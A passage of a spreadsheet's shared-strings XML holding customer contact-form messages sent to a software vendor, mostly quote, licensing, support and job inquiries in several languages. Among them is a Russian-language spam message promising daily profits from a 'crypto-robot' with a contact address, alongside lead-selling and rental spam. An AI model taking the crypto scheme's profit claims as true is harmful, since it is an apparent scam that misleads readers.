Kindly advise a contact person which whom this subject can be discussed, we tried with all available contact details in your website but no chance. _x000D_
Looking forward to your prompt response._x000D_
</t>
  </si>
  <si>
    <t>Could you please send me the quotation of computer forensics?</t>
  </si>
  <si>
    <t xml:space="preserve">We need a portal with following requirements for communication with customers:_x000D_
REQUIREMENTS FOR THE PORTAL:_x000D_
_x000D_
CONTENT DISSEMINATION_x000D_
a)	Ability to connect to MIP_x000D_
b)	Set up rules to send automatic SMS to customers_x000D_
c)	Set up ability to send on demand SMS to customer_x000D_
d)	Rules to send automatic IVR to customers_x000D_
e)	Rules to send on demand IVR to customers_x000D_
f)	Upload different material to be sent at different points of time and ability to customize rules accordingly_x000D_
_x000D_
EDITORIAL FLOW_x000D_
a)	Ability to version different content_x000D_
b)	Content goes through an editorial flow to get vetted before being sent to customers through different modes of delivery_x000D_
_x000D_
DIGITAL MEDIA_x000D_
a)	On demand whatsapp and facebook msgr content delivery in richer formats  pilot in Cambodia_x000D_
b)	BIMA app content dissemination and delivery_x000D_
_x000D_
ANALYTICS_x000D_
a)	Ability to track past content dissemination_x000D_
</t>
  </si>
  <si>
    <t>If I purchase Brava! Desktop DXP Maintenance, will I be able to install the DWG viewer on my desktop ?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
is livelink/opentext compatible to the standard OpenCMIS specifications? We want to use livelink/opentext as document storage, but we have to ensure that standard OpenCMIS specifications are used._x000D_
_x000D_
thanks in advance,_x000D_
_x000D_
best regards,_x000D_
Björn</t>
  </si>
  <si>
    <t xml:space="preserve">hi, if i format the computer , i cant active my serial again , i get the message ( invalid response from licensing host_x000D_
please help </t>
  </si>
  <si>
    <t>寻求CMS项目的合作</t>
  </si>
  <si>
    <t>Documentum Overview</t>
  </si>
  <si>
    <t xml:space="preserve">I need a quote for price reasonableness for a government customer for the following items:_x000D_
Business Intelligence Full-Use License *	S-LLPGIPKG-USA_x000D_
"1st yr maintenance for Business Intelligence Full-Use License *_x000D_
mtn is mandatory"	MAINT-LLPGIPKGUSA_x000D_
</t>
  </si>
  <si>
    <t>Unable to log into fax2mail, easy link, or Open text. I was just charged $99. I wish to cancel my account.</t>
  </si>
  <si>
    <t>I'm having a problem getting an ACH Detail Report from our bank, Union Bank, that goes back 18 months.  We need this information for an audit.  I saw your company name under Union Bank's Information Reporting sections and thought that I'd see if you can assist me.  Union Bank's Cash Management and Tech Support teams have not figured out how to set this up to look back beyond 90 days.  Please help me if you can.  Thanks!</t>
  </si>
  <si>
    <t>I am interested in using eDocs as my Contract Document Management System.</t>
  </si>
  <si>
    <t>Seeking pricing information for RightFax. 25 users and 20 of them sending 3 receiving 3.  Also have 5 users who send approximately 50 and receive 50 each day.  Other users are sporadic users.</t>
  </si>
  <si>
    <t>Do you have any trainning in EDI?</t>
  </si>
  <si>
    <t>Hi, we were a customer with EMC using the Captiva and Documentum product line. I am not sure how we managed the cutover from EMC to OpenText. Please contact me so we can discuss the details.</t>
  </si>
  <si>
    <t>Learning how licensing is billed.</t>
  </si>
  <si>
    <t>x3654_x000D_
We currently use Execute 360. Our servers that are used with Execute 360 are currently located in-house. We will be moving to a different building and our servers are going to a remote colocation._x000D_
The question is if this will affect the users who interact and use WorkDesk that is associated with Execute 360. Will this degrade the service to users? We have two remote offices:_x000D_
-Costa Mesa, CA_x000D_
-Jacksonville, FL_x000D_
Any additional information needed, we can provide.</t>
  </si>
  <si>
    <t>Harrison Police Dept. has decided to put Guidance/OpenText Software, Encase, into use and looking to renew Support / Maintenance, including Training._x000D_
Can you review the status of our account and see what we need to do in-order to continue doing business and proceed.</t>
  </si>
  <si>
    <t>Our forensic equipment needs to be updated and I am interested in learning more about the adapters for the Tableau right blocker, specifically the apple adapter.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to discuss better serving our customers using Opentext/GXS. I have left two voicemail messages and haven't gotten a return call. Perhaps your phone tree is setup wrong, but it always goes to Michelle O'Brian. </t>
  </si>
  <si>
    <t>Hello, May I please have pricing on Right Fax for Win 10 ?_x000D_
This is on behalf of the end user. Let me know._x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I write in behalf of Protraffic SAS, in this moment we are participating in a project of an enterprise architecture software acquisition and i want to know if you can send me an offer of the software that you, also the project have some technical specifications that i will want to validate with you. _x000D_
_x000D_
Thanks for your attention and I am waiting for your prompt answer. Regards._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am pleased to enclose the 2018 CRALO Conference sponsorship information._x000D_
2018 CRALO Sponsor Invitation_x000D_
This November, Conestoga College is hosting the annual conference of Ontario College Registrars, Admissions and Liaison Officers (CRALO) in Waterloo Ontario.  The sponsorship opportunity successfully introduced last year is continuing at this year’s conference and the organizing committee has specifically requested that &lt;&lt;organization&gt;&gt; is included._x000D_
_x000D_
Typically attended by 80 to 100 members, the CRALO conference brings together college decision makers representing Registrar’s offices from each of the 24 Ontario Colleges. This is a great opportunity to make connections and interact with current and future customers._x000D_
_x000D_
Event Details_x000D_
Theme: “Agents of Change”_x000D_
Date: November 21 – 23, 2018_x000D_
Location: Waterloo Delta Hotel_x000D_
Set up: Wednesday November 21 (timing is flexible)_x000D_
Take Down: Friday November 23 (timing is flexible)_x000D_
_x000D_
Sponsor Opportunities_x000D_
•	Six foot table located in the main conference meeting room.  Tables/Displays can be set up for the duration of the event, providing increased visibility and opportunities to interact with conference attendees before and after scheduled events and during breaks_x000D_
•	Attendance at the Wednesday 4:00 pm – 6:00 pm social, located in the main conference meeting room_x000D_
•	Include corporate information and swag in attendee registration packages_x000D_
•	Corporate logo prominently displayed on the event website_x000D_
•	Recognition during event activities_x000D_
•	Sponsorship cost: $500_x000D_
_x000D_
Sponsor spaces are limited, so please confirm your space soon.  To confirm your sponsorship position, or for more information, please feel free to contact me at swalker1@conestogac.on.ca or 519-748-5220 x3377._x000D_
_x000D_
Thank you for considering this opportunity and we look forward to seeing you there._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are Re sellers to the federal government. Price provide GSA pricing for the following._x000D_
RightFax business Server 	1_x000D_
Implementation - RightFax	1_x000D_
FoIP Enable an Existing rightFax Documen	1_x000D_
RightFax Additional document deliverycha	3_x000D_
RightFax PDF Module/Searchable PDF Modul	1_x000D_
RightFax Encryption Module	1_x000D_
Standard ASP support f/RightFax	1_x000D_
Fax Gateway 304 analog - north america	1_x000D_
Fax Gateway 304 analog - advanced replac 	1_x000D_
Fax Gateway 304 analog - standard suppor	1_x000D_
EU_x000D_
Dept of the Navy_x000D_
Place of Performance _x000D_
APO, AP  96543-4010_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am just wondering if you know where Enterprise conference will be for 2019.  I am trying to decide which conference to go to next year._x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
We recently acquired software which has an interface functionality to documentum 7.3 version, and it uses some documentum libraries(dll). We are currently evaluating software but not sure if we need software license to use these libraries. Could you please advice me if we need a software license to use below libraries? If so, could you please advice me if we can download evaluation version of the same?_x000D_
_x000D_
DocumentumFormat.OpenXml.dll_x000D_
DocumentumFormat.OpenXml.xml_x000D_
Emc.Documentum.FS.xxx.dll_x000D_
_x000D_
Regards,_x000D_
Takuya</t>
  </si>
  <si>
    <t>Dear Sir, Madam_x000D_
_x000D_
I am looking to re-locate from South Africa to the Netherlands and came across your advert for Senior Linux System Administrator on the glassdoor dot nl web site ._x000D_
_x000D_
I am a senior software developer and system administrator with extensive knowledge in systems programming particularly around B2B messaging using the AS4 protocol as owner of Flame Computing, DNS as both developer and director of a company running the backend registry for the *.za ccTLDs and .joburg, .capetown, .durban, .africa, .wien, .cologne, .koln gTLDs._x000D_
_x000D_
Should you be interested in talking to me please contact me at the above contacts._x000D_
_x000D_
Sincerely_x000D_
Theo Kramer</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to speak to someone about getting 50 x SSH v.15 licenses for HostExplorer. I have called and left messages and sent this twice but not received a response. </t>
  </si>
  <si>
    <t>We would like to set up a live demo of your product along with pricing options of your OpenText Axcelerate service.</t>
  </si>
  <si>
    <t>Still need the copy of the original contract FSA signed.... please contact me ASAP!</t>
  </si>
  <si>
    <t>I would like to try the OpenText Exceed On Demand server on our Sun machine.     We have the On Demand client but we need to try it on the server.</t>
  </si>
  <si>
    <t>Good morning,_x000D_
just a quick note to ask you what your VAT number is. We company I work for, Fiditalia spa located in Italy, is a customer of yours and since we have a tax compliant including all of our suppliers, we need the vat (value added tax) number for all of them._x000D_
Please get back to me as soon as possible._x000D_
Best regards_x000D_
_x000D_
Vincenzo Distefano</t>
  </si>
  <si>
    <t>I have a lot of issues with our conection with COMPAS Mexico at Aguascalientes plant._x000D_
Is there a posibility that you help us with our ERP INFOR LN to stabilish the correct configuration to the ASN between COMPAS and Raufoss Mexico?_x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t>We have a contract with yourselves for EDRM and I'm trying to get hold of our Account Manager. The previous contact information I had was for David Laird - is this still the case as the emails are bouncing back?</t>
  </si>
  <si>
    <t>I need a quote for Encase Endpoint Investigator, and Encase Endpoint Security</t>
  </si>
  <si>
    <t>BЫ ЭTOГO XOТЕЛИ? МЫ УГАДАЛИ? _x000D_
 _x000D_
ПРИВETCТBУЮ! _x000D_
 _x000D_
К ГАДАЛКE НЕ XOДИ, ВСE ЖАЖДУT ПPOФИТA. B XPУCТЯЩИХ ЗEЛЕНЫX БУMАЖKАX:) ГДЕ ИX BЗЯTЬ, ЧTОБЫ MHОГО И ПO ЗAКOНУ? PAНЬШE БЫЛО ТPУДHO, ТЕПЕPЬ ЭЛЕМEHTАРНО: maybe02@rambler.ru _x000D_
 _x000D_
HE ВЕPИTЕ? ПPOВEPЬTE – ПEPBАЯ «ШТУKA» БAKCОB ВAC УЖЕ ЖДET. В BАШЕМ ЛИЧHOM КAБИHETЕ. _x000D_
 _x000D_
СТОЛЬKO И ДAЖE БOЛЬШE ВЫ БУДEТE ЗAБИPAТЬ ОТСЮДА KAЖДЫE СУТKИ. ЭТО ПРИMEРHО 2-4 BAШИХ ОKЛAДA. НО ИЗ ДOМA И НА AВТOMАTЕ. ЭТО ПЕPВЫЙ KPИПTO-РOБOТ ДЛЯ ТOРГOВ AЛЬТКOЙНАМИ, И OПЦИИ EГO РOСКOШHЫ:) _x000D_
 _x000D_
HИЧЕГО HE CЛЫШАЛИ O ТPEЙДИНГE И KPИПTE? HE БЕДA, BСE ИНТУИTИВНO НACТРAИВАETCЯ TAМ ЖE – В ЛИЧНОМ KАБИHETЕ. ПAРА HAЖATИЙ НА MЫШKУ, И MОЖEТE ЗAHИMАТЬСЯ СВOИМИ ДEЛAМИ. _x000D_
 _x000D_
ДЕHЮЖКИ БУДУT ИДTИ ПОTOKОM СAMИ, ПPOФИТ БУДET ФOРМИРOBАTЬCЯ HА PAЗНИЦЕ B KУРCAX BAЛЮT. _x000D_
 _x000D_
HЕ ОTMАXИВAЙTЕСЬ И HE СОMHЕBАЙTЕСЬ. МОЖET, У BАC БOЛЬШЕ HИKОГДА HЕ БУДET TАKOЙ BОЗМОЖНOСTИ:) ИДИТЕ И ДEЛAЙTE СЕБЕ «БOГAТO» _x000D_
 _x000D_
Я С BAМИ И ГOTОB ПОMOЧЬ, _x000D_
 _x000D_
AЛEКCAНДР СOБОЛЕВ, АВTOР ПPOEКTA _x000D_
 _x000D_
титан</t>
  </si>
  <si>
    <t>Dear sirs,_x000D_
_x000D_
I have FirstClass 7.0 running on an old Mac OS 9.1 server holding 20 or 30 seats/concurrent users._x000D_
_x000D_
I would like to upgrade, but I almost have no budget to do so._x000D_
_x000D_
please be kind to advise me the price to renew my firstclass server</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to get a quote for a license for BIRT eReport Designer.  BOFA already has a contract in place.  Just looking to see how much it costs to purchase a few more additional eReport designer licenses. </t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to activate a licence key you've sent me for afp viewer. when I get to the final stage of the activation process, I get the opening message displayed again as if it's just sending me round in a loop:_x000D_
_x000D_
'you need to register this workstation'_x000D_
click 'yes' to continue </t>
  </si>
  <si>
    <t xml:space="preserve">My email address is no longer valid to sign on to the OpenText site. When I use mike_schott@cinfin.com I receive a message to use a valid email address. I have used in the past but not for awhile.      </t>
  </si>
  <si>
    <t>Hi There I need to reset our Jets Swimwear Password unfortunately I don't know the usernames for the GXS Catalogue upload. _x000D_
_x000D_
Are you able to assist._x000D_
_x000D_
Thanks_x000D_
Renee</t>
  </si>
  <si>
    <t>Please call about a quote and to provide an understanding of how enterprise licensing works</t>
  </si>
  <si>
    <t>I am looking into setting up a UPC catalogue as we are a new Nordstrom supplier.  Can you please e-mail me details of everything I need to know - how the upc catalogue works, how much it costs and how we set it up.  Many thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We are working with Persistent Systems, India and we are IBM contractors._x000D_
We are working on IBM security product which can be used for SAML2.0 SSO integrations. IBM wants to develop quick SAML2.0 SSO connectors of this security product for various service providers and Opentext is one such service provider for which IBM wants to develop such connector. _x000D_
The purpose of these connectors is to make SAML2.0 SSO integration easy and quick for IBM's customers who will be using Opentext and other similar service providers. (In this integration, IBM security product will act as Identity provider and Opentext will be act as Service provider)_x000D_
We are working on this connector development project with IBM. _x000D_
For this connector to work, we want to test SAML SSO integration between IBM security Product and Domain Tools._x000D_
we want to know following:_x000D_
-Does Opentext supports SAML SSO?_x000D_
-Does Opentext supports oAuth or OpenID?_x000D_
-Does free trial supports SAML SSO?_x000D_
If free trial does not support SAML, could you please let us know the pricing details along with Terms and conditions of purchase?_x000D_
_x000D_
Regards,_x000D_
Pooja Dontul_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mais informações sobre a ferramenta Clinical Archive - Health Care_x000D_
Obrigada</t>
  </si>
  <si>
    <t>I would like to learn more about your file translation and transmission capabilities and associated managed services.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am looking for information and prices for possible implementation of Documentum as our document control system here in Aberdeen for MSS. _x000D_
_x000D_
Many thanks_x000D_
Kristin Middleton</t>
  </si>
  <si>
    <t>Which companies in Portugal I can contact to acquire Teleform.</t>
  </si>
  <si>
    <t>aa内容zzzzzzzz</t>
  </si>
  <si>
    <t>Test - Please advise who receives this test email.</t>
  </si>
  <si>
    <t>please provide the email address I need to send software keys to (.elt files)</t>
  </si>
  <si>
    <t>Please provide a quote for OpenText Imaging Enterprise Scan licenses for three Windows 10 PCs.</t>
  </si>
  <si>
    <t xml:space="preserve">Please grant me access to Documentum Products family support and knowledge articles as well. </t>
  </si>
  <si>
    <t>i would like to download the file sharing programme...open text...for use on my desktop PC. Where do I go for this?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
I am a retired naval Captain, i have good understanding of the defense procurement procedures here in Pakistan coupled with good inroads.  In this backdrop i have started my own company to market products like yours here in Pakistan.  I have first hand knowledge of the requirements , i wish not to wary you at this stage, if you are interested in this market and are not represented here, i would be please to work for marketing your products on commission basis.  We can discuss further details if you are interested_x000D_
Kind Regards_x000D_
Captain (RTD) Amir Zubair_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Want to buy Appliance </t>
  </si>
  <si>
    <t>Finalize information to for Procure to Pay system.  Need to be invoiced, payments previously on PCard.</t>
  </si>
  <si>
    <t>Bonjour, nous avons un appel d'offre en cours pour l'implémentation de SAP chez un client. La dématérialisation est à un axe important pour le client. Serait il possible d'avoir une formation pour présenter la solution SAP VIM by opentext ? Je suis en attente d'ITESOFT si ce n'était pas possible. Cordialment. Mickaël</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
Ich benötige Informationen zum Thema Opentext Produktlösungen für SharePoint. Es Handelt sich um eine Sharepoint 2013 Farm dessen Daten in einer bestehenden Extended ECM for Government Umgebung eingespielt werden soll. Welche Lösungen kann Opentext dort anbieten, und wie Funktionieren diese Lösungen. Die Informationen von ihrer Internetseite sind leider nicht ausreichend._x000D_
_x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Christian Mielke</t>
  </si>
  <si>
    <t>To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
We have published a market research report on Global Digital Evidence Management Market -forecasts to 2025._x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report.</t>
  </si>
  <si>
    <t>To signup contract for EDI support.</t>
  </si>
  <si>
    <t>I'm looking for a cloud platform I can use to build an app that takes customer feedback whilst at the retailer to businesses and also publishes it on social media.</t>
  </si>
  <si>
    <t>Could you please provide the upgrade path for TLE 6050 (UNIX) using Informix DB to the latest version ?  Please confirm if the existing maps could be used on the the upgraded version .</t>
  </si>
  <si>
    <t>need to buy licenses for use,need contacter</t>
  </si>
  <si>
    <t xml:space="preserve">We comes from VietinBank and we use to buy your product such as Content Server, Brava, Captiva, xCP, etc. We had also bought your maintenance package  (EMC Enhanced Support) from the time we bought your product until 31-Dec-2017. From 01-Jan-2018 to now, due to the changing of our CEO and approval of capital for maintenance support, we miss the maintenance contract with you. At this time, we has already have the approval of capital for maintenance support, would you please give us the quotes for EMC Enhanced Support from 01-Jan-2019 to 31-Dec-2021 (3 years). Please contact me via email: minhtt@vietinbank.vn _x000D_
</t>
  </si>
  <si>
    <t>I have a couple of questions regarding your platform. I am contactable by email</t>
  </si>
  <si>
    <t xml:space="preserve">Kellie, We've Figure Out What Successful Businesses Do Differently. . ._x000D_
_x000D_
_x000D_
Most of the businesses chooses the wrong decision by putting too much efforts and money on buying crappy leads._x000D_
_x000D_
Those are the  usual and just the typical LIST of Companies, Names, Numbers &amp; Emails. And that’s NOT the type of LEADs we provide._x000D_
Here in OneBlue, we generate Qualified Leads for our clients based on their own target Markets, Objectives &amp; Specification via Digital &amp; Telemarketing approach. making sure that all the Leads we provide for our clients MET and FIT their parameters/criteria by Identifying the four important information._x000D_
*Identify what type of software, system, solution, product or services they using being used._x000D_
*Find our when are they going to evaluate or acquire new one._x000D_
*Identify if they have the capacity to take advantage about what you are offering._x000D_
*Penetrate desire verticals and Identify who are the Decision Makes &amp; Influencers._x000D_
From here we can provide different type of leads:_x000D_
*Opt-In_x000D_
*MQL ( marketing qualified lead )_x000D_
*Content Syndication_x000D_
*Profiling,_x000D_
*Phone and Face to Face Appointments_x000D_
*Event Registrations ( RSVP )_x000D_
I can give you a quick phone call for a detail explaining and show you how are can tailor your needs in regards with providing your sales team qualified leads for them to work on to._x000D_
Just message me if you want to know more._x000D_
</t>
  </si>
  <si>
    <t>I have a computer to forensically review and it is Credant file level encrypted. Encase advertises that they can parse this data. Is this true? How would I go about doing this. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
Could you please forward this message to your HR department. I'd like to apply for the Graphic Designer position located in Waterloo, however your online job portal is not allowing me to login after creating an account (nor is it sending me an email if I click 'Forgot your password?'). _x000D_
I tried providing a link to my resume/cover letter PDF file located in my Dropbox, but this field isn't allowing me to include a link. Instead, could your HR department please email me, and I will attach the PDF to my reply email to them. _x000D_
Thank you! _x000D_
Danette Byatt </t>
  </si>
  <si>
    <t>Please call about purchase, 413-525-6055</t>
  </si>
  <si>
    <t>I am an EnCase customer.  Due to company IT security policies I am unable to access from my corporate machine and have registered for the forums from my personal email.  When I try to go to the EnCase support forums I get a message that I do not have access.  Can access please be granted?  Thanks.</t>
  </si>
  <si>
    <t>need to migrate to cloud</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
I was wondering whether I could speak with someone regarding the largest technology expo in Europe - CeBIT? We would like to know whether Open Text could send a speaker to CeBIT and/or exhibit there for 2019._x000D_
_x000D_
Thank you so much in advance for getting back to me!_x000D_
_x000D_
All the best,_x000D_
_x000D_
Jules Voss</t>
  </si>
  <si>
    <t>We need to upgrade our version of Rightfax. Now we have 10.6, and the support will be ended on november 2018. We need to upgrade to 16.2 EP 4 I think. Whare can I find the sources ? And how I can have activation keys. Thank you</t>
  </si>
  <si>
    <t>We are a Carrier looking for an EDI solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I’m with Better Direct a certified HUBZone &amp; SDVOSB reseller. I’m trying to create a quote for a customer._x000D_
We would like to be an authorized for this product. Could we buy this product from you or do you a have distributors ? _x000D_
_x000D_
End User: 	Department of Agriculture_x000D_
    Shipping to:     New Orleans, Louisiana _x000D_
	Zip:  	70129_x000D_
_x000D_
Please provide Letter of Authorization if applicable_x000D_
Please make sure you provide us an ESD as well as any shipping or freight associated with this request:_x000D_
seats 40_x000D_
Exceed Maintenance Renewal (10-99 seats),  _x000D_
Mfg. part number:  EXMPI550700M-1  </t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I am looking to see if there are any internship programs at opentext. I have heard a lot about you and wanting to see if I can get a chance to learn from the growing company.</t>
  </si>
  <si>
    <t>We currently are using VIP ContentExplorer 9.1.1 Build 326 along with Kofax for capturing our Accounts Payable Invoices.  We are interested to get more information about what products are now available to potentially replace our current solution.  We are using Oracle JD Edwards E1 and need a solution that is integrated with our ERP software.</t>
  </si>
  <si>
    <t>finance/technical support</t>
  </si>
  <si>
    <t>Bechtel would like a demonstration of a product that can replace the old IBM Filenet Image Service.</t>
  </si>
  <si>
    <t xml:space="preserve">They want my    Idea </t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We're working with a client in the Oil &amp; Gas sector in Mexico and we're looking to develop their information management capabilities, among others. Hence, we're looking into different vendors (mainly Hyland and Opentext) to provide a solution for our client. _x000D_
I'd like to get a base quotation for cloud-based Documentum considering 50 users and 1TB storage, as well as a product brochure showcasing the solution's capabilities. Cold storage, DRP and SLAs are a plus. Please email me asap if you need any other information. _x000D_
_x000D_
Regards, _x000D_
Luis Felipe Gonzalez</t>
  </si>
  <si>
    <t xml:space="preserve">Hi!_x000D_
_x000D_
Would you like to have a killer explainer video that will help your prospects understand why your software is better/different/awesome, and why they should buy it?_x000D_
_x000D_
I can create a free script for you that help you to visualize the video._x000D_
_x000D_
Thank you,_x000D_
Daniel_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, such good morning I have some difficulties according to the QSP software I have not been supported for 4 months. I need help urgently</t>
  </si>
  <si>
    <t>Hola, buenos días Tengo algunas dificultades según el software QSP. No recibí soporte durante 4 meses. Necesito ayuda urgentemente</t>
  </si>
  <si>
    <t>General manager SBA loan officer</t>
  </si>
  <si>
    <t>Looking to renew my support for my Encase Dongle. Dongle ID-V978880271_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Peter</t>
  </si>
  <si>
    <t>I need a W-9 from your company to pay the invoice you sent.  Account Number 862421_x000D_
Inv number 1809862421</t>
  </si>
  <si>
    <t>Sobre OpenText Application Governance &amp; Archiving for Microsoft® SharePoint</t>
  </si>
  <si>
    <t>We are a carrier looking for an EDI provider.</t>
  </si>
  <si>
    <t>My GXS Trading Grid account has been locked, and I am hoping you can unlock it.</t>
  </si>
  <si>
    <t>Would like to see if the exstream product would be a fit for Professional Office Services and if so what the pricing would look like.</t>
  </si>
  <si>
    <t>Fax2Mail</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to take Your product Training Authorisation, We are getting leads for your product teamsite admin. If you could give us authorisation training center we can do trainings_x000D_
</t>
  </si>
  <si>
    <t>We need to renew our Fax server solution asap</t>
  </si>
  <si>
    <t xml:space="preserve">PLEASE REPLY VIA THE EMAIL ADDRESS.   It is the most convenient way for me, unless/until we can chat online.      EDI will now be my responsibility.   We have TrustedLink for i .   I do not know where to find serial #s, etc., to request help from you.   I cannot get into the windows piece of TLi.   Appears to be an authority issue, b/c i'm using the same desktop pc as the person I replaced.   She was the EDI coordinator and had access.    </t>
  </si>
  <si>
    <t>I would like to try Design Manager/Designer. I need .ekf file to open it.</t>
  </si>
  <si>
    <t>We have InfoArchive solution installed in our environment. I'm looking for a training / webinar for Application Portfolio Management team who need to understand what is possible to do in this solution, how it works on general level etc. in order work with Archive process in the company and advise in general planning discussions around data retention.</t>
  </si>
  <si>
    <t>Good afternoon Opentext Training._x000D_
I need to send one or more of our staff on a EnCase 8 course. _x000D_
Please can you advise me the best way forward i.e. classroom course or internet/remote learning. I will require a PDF quote please in order that financing can be approved by our Directors._x000D_
Look forward to hearing from you._x000D_
Regards_x000D_
Dave Lattimore</t>
  </si>
  <si>
    <t>Investigating product for business need</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,  _x000D_
_x000D_
Hope you are doing well. _x000D_
 _x000D_
I was going through your website and noticed that your company is organizing event/conference. We can provide you the contact details of all industry professionals who would be interested in attending your upcoming event. The data we provide ranges from all small, medium and large sized companies._x000D_
 _x000D_
Target Job Title : C-Level, Marketing, Decision Makers and Professionals from all verticals and more as you prefer._x000D_
 _x000D_
Kindly let me know if you would be interested in our services._x000D_
</t>
  </si>
  <si>
    <t>Hi, I'm trying to map different sound analytic tools and was wondering whether opentext explore support nordic languages? We are especially interested in the norwegian language._x000D_
_x000D_
Kind regards_x000D_
_x000D_
Fabian S Dietrichson</t>
  </si>
  <si>
    <t>Using RPA on OpenText_x000D_
_x000D_
Hi OpenText Team,_x000D_
_x000D_
We would like to ask if we can integrate RPA (Automation Anywhere specifically) using your tool? If this may be the case can we ask if you have a trial version of this or if your are conducting POCs on your product? We are very much interested in purchasing if our business base would be satisfied by your product. Hoping for your support._x000D_
_x000D_
Thanks,_x000D_
Lou</t>
  </si>
  <si>
    <t>We have a customer (Hospital) that would like to evaluate your software to replace an installation of Goldfax. We would also have to integrate with about 100 Sharp MFPs. Please feel free to contact me via telephone at the number I included. _x000D_
Shawn</t>
  </si>
  <si>
    <t>Accounts Payable invoice scanning and data capture, compatible with SAP</t>
  </si>
  <si>
    <t>We have still have legacy OpenText Reddot v10.1 in our estate. _x000D_
_x000D_
Please can you forward contact detail for designated Account Manager for Compass Group? _x000D_
_x000D_
I need to have a discussion on a product road-map, to your latest offering or whether if possible for a suppler take full management._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Looking for content management system with integration to SAP to implement for our existing SAP clients. We are currently SAP Silver partners in Ghana.</t>
  </si>
  <si>
    <t>I have a Tableu 3.0 bridge, when I present a diskashur-pro2 from istorage-uk&lt;dot&gt;com the Tableu sees the drive, but it doesn't present it to the Window 10 device. This device works fine without the USB blocker. _x000D_
Can you please help me, thank you</t>
  </si>
  <si>
    <t xml:space="preserve">How can I obtain a copy of Exceed 15 for 64-bit? I am only able to download the 32-bit version from 'My support' </t>
  </si>
  <si>
    <t>Bonjour_x000D_
Nous sommes utilisateur d’une licence Teleform 10.4 solution monoposte. Cette licence n’est plus sous garantie depuis 2015. Nous souhaitons pouvoir poursuivre cette utilisation pendant encore 3 ans. Nous n’avons aucun autre logiciel en vue compte tenu que nous utilisons encore une cinquantaine de formulaires .tft._x000D_
Pourriez-vous nous proposer une solution et nous envoyer un devis pour maintenir notre logiciel Teleform ou évoluer vers une évolution logiciel si nécessaire (sachant que nous souhaiterions reprendre nos fichiers .tft)._x000D_
En vous remerciant_x000D_
Bien cordialement</t>
  </si>
  <si>
    <t>Hi I'm looking to Embed OpenText Analytics in my app. I'm currently using power bi but i want to explore more cost effective solution. My app as currently a low user base, can you share pricing for your solution beyond the free trial</t>
  </si>
  <si>
    <t>Hello,_x000D_
I tried to recover my password, but the system informed me that there is no account linked to my eMail address. Could you please review this? There are still many files stored in my account._x000D_
kind regards,_x000D_
Hilko Busse</t>
  </si>
  <si>
    <t xml:space="preserve">Account not able to register dongle and download updates because site responds we don't have support contract. </t>
  </si>
  <si>
    <t>Query for OpenText Vendor Invoice Management (VIM) Certification Course</t>
  </si>
  <si>
    <t xml:space="preserve">for the Sizing for the Open text SAP DMS </t>
  </si>
  <si>
    <t>Bidding for DMS RFA ,looking for eom for the same,please arrange a call with ur client representative asap.</t>
  </si>
  <si>
    <t>PLACE AVILABLE rent.....GROUND FLOOR FIRST FLOOR SECOND FLOOR TOTAL_x000D_
7500SFT G;;;2500 FIRST 2500 SECOND2500 HEADROOM AND PARKING AVAILABLE_x000D_
NEAR TO Jawaharlal nehru ROAD 100FT ROAD INDUS-TIL ESTATE GUINDY_x000D_
 R.JANARDHANAN 35NAGATHAMANKIOLSTEXT 12TH AVANUE ASHOKNAGAR_x000D_
CHENNAI600083_x000D_
----</t>
  </si>
  <si>
    <t>place forrent</t>
  </si>
  <si>
    <t>How do I update my Magellan Road Mate?</t>
  </si>
  <si>
    <t>I have given the digital interview for the internship position at your company through hirevue on 09/08/2018. It's been two weeks I have given the interview, but I didn't get any response from you for the futher rounds. Kindly please inform me whether I'm qualified for the next round or not? Digital Interview Code: Pdu33ec-2y9kr3</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
I am looking for some advice on a personal data breach against myself. _x000D_
I was recently involved with a dept collection agency. A debt collection officer came to my property whilst I was on holiday and discussed the case with someone who was house sitting for me and collected money from this person. This particular officer also refused to give a receipt for the handover of this money, leaving the person confused and upset as to whether she had been scammed. _x000D_
I am just looking for some advice as to whether this is against recent updates in GDPR laws, as I feel completely outraged that my case would be discussed with anyone other than myself. _x000D_
Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">i need a job </t>
  </si>
  <si>
    <t>Looking for job opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Business Partner_x000D_
_x000D_
Well, I am Rizad from Power International Holding - Qatar, We are using RightFax from the beginning. our vendor is from UAE and we are facing problem in payments and many business-related issues between Qatar and UAE. We prefer to work directly with OpenText or send us some vendors who are doing this here in Qatar. We need to renew the licenses before it gets expired._x000D_
_x000D_
Thanks_x000D_
Mohamed Rizad_x000D_
</t>
  </si>
  <si>
    <t>I noticed a charge on me CC account for $179 and want to inquire about it. Please advise.</t>
  </si>
  <si>
